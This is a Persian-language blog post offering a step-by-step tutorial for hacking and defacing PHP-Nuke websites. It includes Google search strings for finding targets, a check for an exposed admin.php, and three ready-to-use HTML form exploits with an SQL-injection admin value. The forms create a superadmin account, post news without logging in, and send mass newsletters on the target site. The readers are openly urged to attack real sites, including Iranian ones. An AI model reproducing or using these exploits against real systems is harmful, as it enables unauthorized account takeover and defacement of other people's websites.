| تبليغات | X |
...............................
..............................
براي تبادل لينك يا لوگو ابتدا لينک و لوگو مارا بانام:آموزش کامپیوتر - آموزش هك سايتهای phpnuke در
وبلاگ ياسايتتان قراردهيد ،
سپس از طريق فرم نظرات به ما خبر دهيد تاما هم اين کار رو براي شما بکنيم.
هفته چهارم فروردین 1387
هفته سوم فروردین 1387
هفته دوم فروردین 1387
هفته اوّل فروردین 1387
هفته چهارم اسفند 1386
هفته سوم اسفند 1386
هفته دوم اسفند 1386
شایان ذکر است این وبلاگ هیچگونه وابستگی به دانشگاه شبستر و مسئولین محترم ندارد.
آموزش هك سايتهای phpnukeخیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و...
به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید..
من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین.
برای شروع به گوگل برید (www.google.com) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟
برای این کار کافیه این نوشته رو کپی و پیست کنید.
كد:
modules.php?name=Downloads
این ماژول در تمامی ورژن های php nuke وجود داره.
خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره
برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه
ممکنه به این شکلها باشه:
كد:
http://www.sitename.com/phpnuke/mod...?name=Downloads www.sitename.com/html/modules.php?name=Downloads http://www.sitename.com/portal/modu...?name=Downloads www.sitename.com/modules.php?name=Downloads
برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه
برای اینکه بدونین هست یا نه
كد:
modules.php?name=Downloads
اینو پاک کنین و جاش بنویسید admin.php
مثلآ:
كد:
www.sitename.com/admin.php
اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته.
اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید.
خوب تالا ما فرض میکنیم که admin.php وجود داره.
من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.
شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.
بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.
کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor">p> <input type="submit" name="Submit" value="Create Admin"><br> form>
کد دوم: با این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50>textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> p> <p> <input type="submit" name="Submit" value="Post this message"> <br> p>
کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50>textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> p> form>
خوب اینم از آموزش هک کردن سایتهای popnuke از این روش
امیدوارم به کارتون بخوره
اراستی اگه می خواین سایت های ایرانی که از php nuke استفاده می کنند را پیدا کنید کافیه
به googel برید و عبارت Farsi project by PHP-Nuke را بنویسید .
[+]
نوشته شده توسط آزاده سرخوش در 
|
|
وب دنياى ورود به اينترنت آشنائی با پروتکل DNS آموزش روش جستجو در گوگل آیا دوستان شما در 24 ساعت گذشته در یاهو مسنجر آنلاین بوده اند؟ ورود هکرها به VMWare تولید حافظه رایانه ای متراکم با نانوسیمها لينوكس يعني هر چيزي كه ويندوز ندارد! معرفی و مقابله با تروجان Spam, Worm, Trojan IP وPort را چگونه بیابیم؟ آموزش هك سايتهای phpnuke عبور از پسورد ويندوز xp و setup كامپيوتر بدون دانستن رمز عوض کردن پسورد ويندوز چه نوع موتور جستجو ( Search Engine ) يا دايركتوري (Directory ) بايد استفاده كرد؟ Internet Explorer Auto Complete
